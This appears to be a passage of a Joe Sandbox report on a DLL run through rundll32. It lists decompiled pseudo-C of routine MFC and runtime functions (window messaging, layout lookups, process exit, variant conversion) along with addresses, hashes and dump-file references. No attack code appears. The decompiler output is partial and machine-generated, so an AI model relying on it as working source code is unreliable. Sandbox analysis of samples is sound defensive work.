				_t64 =  *(_t72 + 0x48);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x48) =  *(_t72 + 0x48) & 0x00000000;
				if(( *(_t72 + 0x38) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E100373DB() + 0x3c));
					if(_t71 != 0 &&  *(_t71 + 0x1c) != 0) {
						E10011C50( &_v52, 0, 0x30);
						_t48 =  *(_t72 + 0x1c);
						_v44 = _t48;
						_v40 = _t48;
						_v52 = 0x28;
						_v48 = 1;
						SendMessageA( *(_t71 + 0x1c), 0x405, 0,  &_v52);
					}
				}
				_t34 = GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc);
				E1002204B(_t72);
				if(GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc) == _t34) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x1c), 0xfffffffc, _t43);
					}
				}
				E10022168(_t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}















                                                                        0x1002223c
                                                                        0x10022243
                                                                        0x10022249
                                                                        0x1002224e
                                                                        0x10022273
                                                                        0x10022273
                                                                        0x10022279
                                                                        0x1002227b
                                                                        0x1002227b
                                                                        0x10022279
                                                                        0x1002227e
                                                                        0x10022283
                                                                        0x10022287
                                                                        0x1002228a
                                                                        0x1002228a
                                                                        0x1002228d
                                                                        0x10022295
                                                                        0x1002229a
                                                                        0x1002229a
                                                                        0x1002229d
                                                                        0x100222a4
                                                                        0x100222ab
                                                                        0x100222b0
                                                                        0x100222c0
                                                                        0x100222c5
                                                                        0x100222cb
                                                                        0x100222ce
                                                                        0x100222df
                                                                        0x100222e6
                                                                        0x100222e9
                                                                        0x100222e9
                                                                        0x100222b0
                                                                        0x100222fb
                                                                        0x10022301
                                                                        0x10022310
                                                                        0x1002231c
                                                                        0x10022320
                                                                        0x10022328
                                                                        0x10022328
                                                                        0x10022320
                                                                        0x10022330
                                                                        0x10022343

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: LongWindow$MessageSend
                                                                        • String ID: (
                                                                        • API String ID: 2178440468-3887548279
                                                                        • Opcode ID: a0256d8b5034a2fee01dc273fb99e3b5b93d09b5292866429bde14ed636a8408
                                                                        • Instruction ID: 74d92888995a03eb436cf4db0a6f1431d092ba1e50ceac8416b65ae125f9645e
                                                                        • Opcode Fuzzy Hash: a0256d8b5034a2fee01dc273fb99e3b5b93d09b5292866429bde14ed636a8408
                                                                        • Instruction Fuzzy Hash: 0C31AD34600615FFCB21DFA9E884A6EB7F8FF04250F52062DE5429B692CB31F848CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10032286 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10032286(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
				void* __ebp;
				void* _t29;
				int _t30;
				void* _t35;
				void* _t38;
				intOrPtr* _t40;
				int _t42;
				intOrPtr* _t45;
				void* _t46;

				_t45 = __ecx;
				_t29 = E10022AD5(__ecx);
				_t40 =  *((intOrPtr*)(_t45 + 0x7c));
				_t42 = _a4;
				_t38 = _t29;
				if(_t40 == 0) {
					L2:
					if(_a8 != 0xffff) {
						if(_t42 == 0 || (_a8 & 0x00000810) != 0) {
							 *(_t45 + 0xa4) =  *(_t45 + 0xa4) & 0x00000000;
							goto L17;
						} else {
							if(_t42 < 0xf000 || _t42 >= 0xf1f0) {
								if(_t42 < 0xff00) {
									goto L13;
								}
								 *(_t45 + 0xa4) = 0xef1f;
								goto L17;
							} else {
								_t42 = (_t42 + 0xffff1000 >> 4) + 0xef00;
								L13:
								 *(_t45 + 0xa4) = _t42;
								L17:
								 *(_t38 + 0x38) =  *(_t38 + 0x38) | 0x00000040;
								L18:
								_t30 =  *(_t45 + 0xa4);
								if(_t30 ==  *((intOrPtr*)(_t45 + 0xa8))) {
									L21:
									return _t30;
								}
								_t30 = E100220EE(_t46, GetParent( *(_t45 + 0x1c)));
								if(_t30 == 0) {
									goto L21;
								}
								return PostMessageA( *(_t45 + 0x1c), 0x36a, 0, 0);
							}
						}
					}
					 *(_t45 + 0x38) =  *(_t45 + 0x38) & 0xffffffbf;
					if( *((intOrPtr*)(_t38 + 0x64)) != 0) {
						 *(_t45 + 0xa4) = 0xe002;
					} else {
						 *(_t45 + 0xa4) = 0xe001;
					}
					SendMessageA( *(_t45 + 0x1c), 0x362,  *(_t45 + 0xa4), 0);
					_t35 =  *((intOrPtr*)( *_t45 + 0x150))();
					if(_t35 != 0) {
						UpdateWindow( *(_t35 + 0x1c));
					}
					goto L18;
				}
				_t30 =  *((intOrPtr*)( *_t40 + 0x7c))(_t42, _a8, _a12);
				if(_t30 != 0) {
					goto L21;
				}
				goto L2;
			}












                                                                        0x1003228c
                                                                        0x1003228e
                                                                        0x10032293
                                                                        0x10032298
                                                                        0x1003229b
                                                                        0x1003229d
                                                                        0x100322b3
                                                                        0x100322ba
                                                                        0x1003230d
                                                                        0x10032352
                                                                        0x00000000
                                                                        0x10032317
                                                                        0x1003231d
                                                                        0x10032344
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10032346
                                                                        0x00000000
                                                                        0x10032327
                                                                        0x10032330
                                                                        0x10032336
                                                                        0x10032336
                                                                        0x10032359
                                                                        0x10032359
                                                                        0x1003235d
                                                                        0x1003235d
                                                                        0x10032369
                                                                        0x10032394
                                                                        0x10032394
                                                                        0x10032394
                                                                        0x10032375
                                                                        0x1003237c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1003238a
                                                                        0x1003231d
                                                                        0x1003230d
                                                                        0x100322bc
                                                                        0x100322c4
                                                                        0x100322d2
                                                                        0x100322c6
                                                                        0x100322c6
                                                                        0x100322c6
                                                                        0x100322ec
                                                                        0x100322f6
                                                                        0x100322fe
                                                                        0x10032303
                                                                        0x10032303
                                                                        0x00000000
                                                                        0x100322fe
                                                                        0x100322a8
                                                                        0x100322ad
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Message$ParentPostSendUpdateWindow
                                                                        • String ID: @
                                                                        • API String ID: 4141989945-2766056989
                                                                        • Opcode ID: bad5658601269fb567b95f36ded4ee85d4dfb2814405908c13ec14e44f39eb87
                                                                        • Instruction ID: 6191196fd6615e40dc101e77c52f198469b7c7f61996bf1ea28baad2e91494f1
                                                                        • Opcode Fuzzy Hash: bad5658601269fb567b95f36ded4ee85d4dfb2814405908c13ec14e44f39eb87
                                                                        • Instruction Fuzzy Hash: 8D319635601B05EFEB22CF21CD48B5A77E5FF41352F258828E65A9E1A1C7B9A980DB01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10034CE3 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E10034CE3(void* __ecx, void* __eflags) {
				intOrPtr _t18;
				intOrPtr* _t20;
				intOrPtr _t26;
				void* _t33;
				void* _t35;

				E10011BF0(0x1003a3fc, _t35);
				_push(__ecx);
				_t33 = __ecx;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				E10034BFF(__ecx, 0x20, _t35 - 0x10);
				if( *((intOrPtr*)(_t35 + 8)) != 0 &&  *((intOrPtr*)(_t35 - 0x10)) == 0) {
					_t26 = E1001F77E(0x20);
					 *((intOrPtr*)(_t35 - 0x10)) = _t26;
					_t41 = _t26;
					 *(_t35 - 4) = 0;
					if(_t26 == 0) {
						_t20 = 0;
						__eflags = 0;
					} else {
						_push(0x1e);
						_push( *((intOrPtr*)(_t35 + 8)));
						_push("File%d");
						_push("Recent File List");
						_push(0);
						_t20 = E10024F0F(_t26, _t41);
					}
					 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x84)) = _t20;
					 *((intOrPtr*)( *_t20 + 0x10))();
				}
				_t18 = E1003599F(_t33, "Settings", "PreviewPages", 0);
				 *((intOrPtr*)(_t33 + 0x90)) = _t18;
				 *[fs:0x0] =  *((intOrPtr*)(_t35 - 0xc));
				return _t18;
			}








                                                                        0x10034ce8
                                                                        0x10034ced
                                                                        0x10034cf8
                                                                        0x10034cfa
                                                                        0x10034cfd
                                                                        0x10034d05
                                                                        0x10034d14
                                                                        0x10034d16
                                                                        0x10034d19
                                                                        0x10034d1b
                                                                        0x10034d1e
                                                                        0x10034d37
                                                                        0x10034d37
                                                                        0x10034d20
                                                                        0x10034d20
                                                                        0x10034d22
                                                                        0x10034d25
                                                                        0x10034d2a
                                                                        0x10034d2f
                                                                        0x10034d30
                                                                        0x10034d30
                                                                        0x10034d39
                                                                        0x10034d3d
                                                                        0x10034d47
                                                                        0x10034d47
                                                                        0x10034d57
                                                                        0x10034d5f
                                                                        0x10034d67
                                                                        0x10034d6f

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10034CE8
                                                                          • Part of subcall function 10024F0F: __EH_prolog.LIBCMT ref: 10024F14
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog
                                                                        • String ID: File%d$PreviewPages$Recent File List$Settings
                                                                        • API String ID: 3519838083-526586445
                                                                        • Opcode ID: 932e69f2a25fdaf2d1d7247067e9866bd34830d2efb07ad355ada0066ba91e73
                                                                        • Instruction ID: 492fd1891bf7533495f0361d30171d8b100ab146b8dd749383e38376895f11d0
                                                                        • Opcode Fuzzy Hash: 932e69f2a25fdaf2d1d7247067e9866bd34830d2efb07ad355ada0066ba91e73
                                                                        • Instruction Fuzzy Hash: FA01B579A00605AFCB16EF649C05BEEBAB5FB84712F11861FF1569F281DF70A5408750
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10028BC6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E10028BC6(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				void* _t9;
				void* _t10;

				_t10 = __ecx;
				_t4 = GetModuleHandleA("GDI32.DLL");
				_t9 = 0;
				_t5 = GetProcAddress(_t4, "SetLayout");
				if(_t5 == 0) {
					if(_a4 != 0) {
						_t9 = 0xffffffff;
						SetLastError(0x78);
					}
				} else {
					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
				}
				return _t9;
			}







                                                                        0x10028bcd
                                                                        0x10028bcf
                                                                        0x10028bdb
                                                                        0x10028bdd
                                                                        0x10028be5
                                                                        0x10028bf8
                                                                        0x10028bfc
                                                                        0x10028bff
                                                                        0x10028bff
                                                                        0x10028be7
                                                                        0x10028bf0
                                                                        0x10028bf0
                                                                        0x10028c09

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10030BC6,00000000), ref: 10028BCF
                                                                        • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 10028BDD
                                                                        • SetLastError.KERNEL32(00000078,?,?,10030BC6,00000000), ref: 10028BFF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressErrorHandleLastModuleProc
                                                                        • String ID: GDI32.DLL$SetLayout
                                                                        • API String ID: 4275029093-2147214759
                                                                        • Opcode ID: f829d107276f7f8dc5ff7ef364a20be20c27fb831297046e44f9a224b6ca2c99
                                                                        • Instruction ID: de10e2654153e74bad07dc63c5cb2a97a5a293e8e121725d640a5f2c86b9b1e6
                                                                        • Opcode Fuzzy Hash: f829d107276f7f8dc5ff7ef364a20be20c27fb831297046e44f9a224b6ca2c99
                                                                        • Instruction Fuzzy Hash: 1AE02077105110BFD253875A9C48C5F7B62D7C4372B11C619F276D5090CB3188018721
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10028B90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E10028B90(signed int __ecx) {
				_Unknown_base(*)()* _t3;
				signed int _t7;
				signed int _t8;

				_t7 = __ecx;
				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
				if(_t3 == 0) {
					_t8 = _t7 | 0xffffffff;
					SetLastError(0x78);
				} else {
					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
				}
				return _t8;
			}






                                                                        0x10028b96
                                                                        0x10028ba4
                                                                        0x10028bac
                                                                        0x10028bb9
                                                                        0x10028bbc
                                                                        0x10028bae
                                                                        0x10028bb3
                                                                        0x10028bb3
                                                                        0x10028bc5

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(GDI32.DLL,?,10030BB9), ref: 10028B98
                                                                        • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10028BA4
                                                                        • SetLastError.KERNEL32(00000078), ref: 10028BBC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressErrorHandleLastModuleProc
                                                                        • String ID: GDI32.DLL$GetLayout
                                                                        • API String ID: 4275029093-2396518106
                                                                        • Opcode ID: 8afe1690608ce82dbca3926b0a057167ce80ddde095d094937dead2d2ff1ddbb
                                                                        • Instruction ID: 54bc3d33d325d2134ddbcfb4761d493361e18e0aa1f1c781400aef32ec3f8dd9
                                                                        • Opcode Fuzzy Hash: 8afe1690608ce82dbca3926b0a057167ce80ddde095d094937dead2d2ff1ddbb
                                                                        • Instruction Fuzzy Hash: BBD05EB6A052346FDAA35BF5AC4CE5A7A54DB047B2B418669FD65EA1E0CB24CC008790
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10011DCF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13libraryloaderCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E10011DCF(int _a4) {
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;

				_t3 = GetModuleHandleA("mscoree.dll");
				if(_t3 != 0) {
					_t4 = GetProcAddress(_t3, "CorExitProcess");
					if(_t4 != 0) {
						 *_t4(_a4);
					}
				}
				ExitProcess(_a4);
			}





                                                                        0x10011dd4
                                                                        0x10011ddc
                                                                        0x10011de4
                                                                        0x10011dec
                                                                        0x10011df2
                                                                        0x10011df2
                                                                        0x10011dec
                                                                        0x10011df8

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(mscoree.dll,10011F3D,?,10041DB0,00000008,10011F63,?,00000001,00000000,10016CF1,00000003), ref: 10011DD4
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10011DE4
                                                                        • ExitProcess.KERNEL32 ref: 10011DF8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressExitHandleModuleProcProcess
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 75539706-1276376045
                                                                        • Opcode ID: 3fc20c7666ee96b06c5226d441d543eb9b5fbec8a0200ca7e01eb325b998744c
                                                                        • Instruction ID: 44dc424d0b29a2a163b933457fd361873f6b0f507bf76f9d722852a62850aa7a
                                                                        • Opcode Fuzzy Hash: 3fc20c7666ee96b06c5226d441d543eb9b5fbec8a0200ca7e01eb325b998744c
                                                                        • Instruction Fuzzy Hash: F2D0C9B0604217AFEA429BB2CD48DEB3AA8EF406857108428F416D8021CF31CD019B11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100394B0 Relevance: 7.7, APIs: 5, Instructions: 236stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 53%
                                                                        			E100394B0(intOrPtr __ecx, intOrPtr __edx) {
				CHAR* _t94;
				void* _t100;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t114;
				void* _t116;
				void* _t117;
				void* _t120;
				signed short _t123;
				signed int _t125;
				signed int _t128;
				void* _t134;
				char _t140;
				CHAR* _t144;
				intOrPtr* _t147;
				void* _t149;
				void* _t151;
				intOrPtr _t153;
				signed short* _t156;
				void* _t157;
				CHAR* _t159;
				int _t161;
				char* _t166;
				void* _t167;
				void* _t168;
				void* _t170;
				CHAR* _t171;
				char* _t174;
				CHAR* _t182;

				_t153 = __edx;
				_t148 = __ecx;
				E10011BF0(0x1003b2f6, _t168);
				_t171 = _t170 - 0x2c;
				_t144 =  *(_t168 + 8);
				_t94 = _t144[8];
				 *(_t168 - 0x10) = _t171;
				 *((intOrPtr*)(_t168 - 0x20)) = __ecx;
				 *(_t168 - 0x11) = 0;
				 *(_t168 + 8) = _t94;
				if(_t94 == 0) {
					 *(_t168 + 8) = _t168 - 0x11;
				}
				_t161 = lstrlenA( *(_t168 + 8));
				 *(_t168 - 0x18) = _t144[0x10];
				 *(_t168 - 0x1c) = _t144[0xc];
				if(( *(_t168 + 0xc) & 0x0000000c) == 0) {
					L7:
					_t145 =  *(_t168 + 0x14);
					_t100 = E10001000(_t148, ( *(_t168 + 0x14))[8] << 4);
					_pop(_t149);
					if(_t100 == 0) {
						L9:
						_t101 = 0x8007000e;
						L47:
						 *[fs:0x0] =  *((intOrPtr*)(_t168 - 0xc));
						return _t101;
					}
					E10010B20((_t145[8] << 0x00000004) + 0x00000003 & 0xfffffffc, _t149);
					 *(_t168 - 0x10) = _t171;
					 *(_t168 + 0xc) = _t171;
					E10011C50( *(_t168 + 0xc), 0, _t145[8] << 4);
					_t174 =  &(_t171[0xc]);
					_t156 = E10039215( *(_t168 + 8),  *(_t168 - 0x1c));
					_t38 =  &(_t156[8]); // 0x10
					_t165 = _t38;
					_t108 = E10001000(_t149, _t38);
					_pop(_t151);
					if(_t108 != 0) {
						E10010B20( &(_t165[1]) & 0xfffffffc, _t151);
						 *(_t168 - 0x10) = _t174;
						_t166 = _t174;
						_t114 = E10039257( *((intOrPtr*)(_t168 - 0x20)), _t166,  *(_t168 + 8), _t168 - 0x34,  *(_t168 - 0x1c), _t145,  *((intOrPtr*)(_t168 + 0x18)),  *(_t168 + 0xc));
						_t147 = 0;
						 *((intOrPtr*)(_t168 + 0x18)) = _t114;
						if(_t114 != 0) {
							L17:
							_t166 =  *(_t168 + 0x14);
							 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
							_t157 = 0;
							if(_t166[8] <= 0) {
								L20:
								_t101 =  *((intOrPtr*)(_t168 + 0x18));
								if(_t101 != 0) {
									goto L47;
								}
								_t156 =  *(_t168 + 0x10);
								if(_t156 == 0) {
									_t116 = ( *(_t168 - 0x1c) & 0x0000ffff) - 8;
									if(_t116 == 0) {
										if(_t147 != 0) {
											__imp__#6(_t147);
										}
										L46:
										_t101 = 0;
										goto L47;
									}
									_t117 = _t116 - 1;
									if(_t117 == 0) {
										L41:
										if(_t147 != 0) {
											 *((intOrPtr*)( *_t147 + 8))(_t147);
										}
										goto L46;
									}
									_t120 = _t117 - 3;
									if(_t120 == 0) {
										__imp__#9(_t168 - 0x34);
										goto L46;
									}
									if(_t120 != 1) {
										goto L46;
									}
									goto L41;
								}
								_t123 =  *(_t168 - 0x1c);
								 *_t156 = _t123;
								_t125 = (_t123 & 0x0000ffff) + 0xfffffffe;
								if(_t125 > 0x13) {
									goto L46;
								}
								switch( *((intOrPtr*)(_t125 * 4 +  &M10039776))) {
									case 0:
										L35:
										 *(__edi + 8) = __bx;
										goto L46;
									case 1:
										 *(__edi + 8) = __ebx;
										goto L46;
									case 2:
										__eax =  *(__ebp - 0x34);
										 *(__edi + 8) =  *(__ebp - 0x34);
										goto L46;
									case 3:
										 *(__edi + 8) =  *(__ebp - 0x34);
										goto L46;
									case 4:
										__eax =  *(__ebp - 0x34);
										 *(__edi + 8) =  *(__ebp - 0x34);
										__eax =  *(__ebp - 0x30);
										 *(__edi + 0xc) =  *(__ebp - 0x30);
										goto L46;
									case 5:
										__ebx =  ~__ebx;
										asm("sbb ebx, ebx");
										goto L35;
									case 6:
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										goto L46;
									case 7:
										goto L46;
									case 8:
										 *(__edi + 8) = __bl;
										goto L46;
								}
							}
							do {
								__imp__#9( *(_t168 + 0xc));
								 *(_t168 + 0xc) =  &(( *(_t168 + 0xc))[0x10]);
								_t157 = _t157 + 1;
							} while (_t157 < _t166[8]);
							goto L20;
						}
						_t128 =  *(_t168 - 0x1c) & 0x0000ffff;
						 *(_t168 - 4) = 0;
						if(_t128 == 4) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							E1003A087();
							 *(_t168 + 8) = _t182;
							 *(_t168 - 0x34) =  *(_t168 + 8);
							goto L17;
						}
						if(_t128 == 5) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							E1003A087();
							asm("fst qword [ebp-0x24]");
							L27:
							 *(_t168 - 0x34) = _t182;
							goto L17;
						}
						if(_t128 == 7) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							E1003A087();
							asm("fst qword [ebp-0x24]");
							goto L27;
						}
						if(_t128 <= 0x13 || _t128 > 0x15) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							_t147 = E1003A087();
						} else {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							 *(_t168 - 0x34) = E1003A087();
							 *((intOrPtr*)(_t168 - 0x30)) = _t153;
						}
						goto L17;
					}
					goto L9;
				}
				_t17 = _t161 + 3; // 0x3
				_t158 = _t17;
				_t134 = E10001000(_t148, _t17);
				_pop(_t148);
				if(_t134 == 0) {
					goto L9;
				}
				E10010B20(_t158 + 0x00000003 & 0xfffffffc, _t148);
				 *(_t168 - 0x10) = _t171;
				_t159 = _t171;
				E10011440(_t159,  *(_t168 + 8), _t161);
				_t140 = _t144[0xc];
				_t171 =  &(_t171[0xc]);
				 *(_t168 + 8) = _t159;
				if(_t140 == 8) {
					_t140 = 0xe;
				}
				_t159[_t161] = 0xff;
				_t167 = _t161 + 1;
				 *(_t168 - 0x1c) =  *(_t168 - 0x1c) & 0x00000000;
				_t159[_t167] = _t140;
				_t159[_t167 + 1] = 0;
				 *(_t168 - 0x18) = _t144[0x14];
				goto L7;
			}
































                                                                        0x100394b0
                                                                        0x100394b0
                                                                        0x100394b5
                                                                        0x100394ba
                                                                        0x100394be
                                                                        0x100394c1
                                                                        0x100394c8
                                                                        0x100394cb
                                                                        0x100394ce
                                                                        0x100394d2
                                                                        0x100394d5
                                                                        0x100394da
                                                                        0x100394da
                                                                        0x100394ea
                                                                        0x100394ef
                                                                        0x100394f6
                                                                        0x100394fa
                                                                        0x10039554
                                                                        0x10039554
                                                                        0x1003955e
                                                                        0x10039565
                                                                        0x10039566
                                                                        0x100395aa
                                                                        0x100395aa
                                                                        0x10039762
                                                                        0x10039768
                                                                        0x10039773
                                                                        0x10039773
                                                                        0x10039576
                                                                        0x1003957b
                                                                        0x1003957e
                                                                        0x10039587
                                                                        0x1003958c
                                                                        0x1003959a
                                                                        0x1003959c
                                                                        0x1003959c
                                                                        0x100395a0
                                                                        0x100395a7
                                                                        0x100395a8
                                                                        0x100395bc
                                                                        0x100395c4
                                                                        0x100395c7
                                                                        0x100395db
                                                                        0x100395e0
                                                                        0x100395e4
                                                                        0x100395e7
                                                                        0x10039625
                                                                        0x10039625
                                                                        0x10039628
                                                                        0x1003962c
                                                                        0x10039631
                                                                        0x1003964c
                                                                        0x1003964c
                                                                        0x10039651
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039657
                                                                        0x1003965c
                                                                        0x1003972d
                                                                        0x10039730
                                                                        0x10039757
                                                                        0x1003975a
                                                                        0x1003975a
                                                                        0x10039760
                                                                        0x10039760
                                                                        0x00000000
                                                                        0x10039760
                                                                        0x10039732
                                                                        0x10039733
                                                                        0x1003973d
                                                                        0x1003973f
                                                                        0x10039744
                                                                        0x10039744
                                                                        0x00000000
                                                                        0x1003973f
                                                                        0x10039735
                                                                        0x10039738
                                                                        0x1003974d
                                                                        0x00000000
                                                                        0x1003974d
                                                                        0x1003973b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1003973b
                                                                        0x10039662
                                                                        0x10039665
                                                                        0x1003966b
                                                                        0x10039671
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039677
                                                                        0x00000000
                                                                        0x1003971a
                                                                        0x1003971a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100396f3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039706
                                                                        0x10039709
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10039711
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100396f8
                                                                        0x100396fb
                                                                        0x100396fe
